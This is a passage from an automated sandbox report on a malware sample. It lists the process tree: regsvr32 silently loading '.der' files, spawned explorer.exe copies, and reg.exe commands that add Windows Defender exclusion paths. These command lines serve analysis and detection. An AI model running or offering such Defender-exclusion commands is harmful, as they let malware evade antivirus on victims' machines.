      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 2788 Parent PID: 1812

      General

      Start time:11:10:17
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Fiosa.der'
      Imagebase:0x340000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: explorer.exe PID: 3060 Parent PID: 2152

      General

      Start time:11:10:36
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x990000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 2972 Parent PID: 2824

      General

      Start time:11:10:38
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa2.der
      Imagebase:0xff640000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 2012 Parent PID: 2972

      General

      Start time:11:10:38
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa2.der
      Imagebase:0x340000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: explorer.exe PID: 536 Parent PID: 2788

      General

      Start time:11:10:47
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x990000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: reg.exe PID: 840 Parent PID: 536

      General

      Start time:11:10:48
      Start date:27/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yiiocubi' /d '0'
      Imagebase:0xff4c0000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: reg.exe PID: 2188 Parent PID: 536

      General

      Start time:11:10:51
      Start date:27/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nqsaq' /d '0'
      Imagebase:0xff200000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: explorer.exe PID: 2100 Parent PID: 2012

      General

      Start time:11:11:10
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x990000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 2684 Parent PID: 1672

      General

      Start time:11:12:00
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
      Imagebase:0xff6d0000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 1184 Parent PID: 2684

      General

      Start time:11:12:00
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Fiosa.der'
      Imagebase:0x770000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Disassembly

      Code Analysis

      Reset < >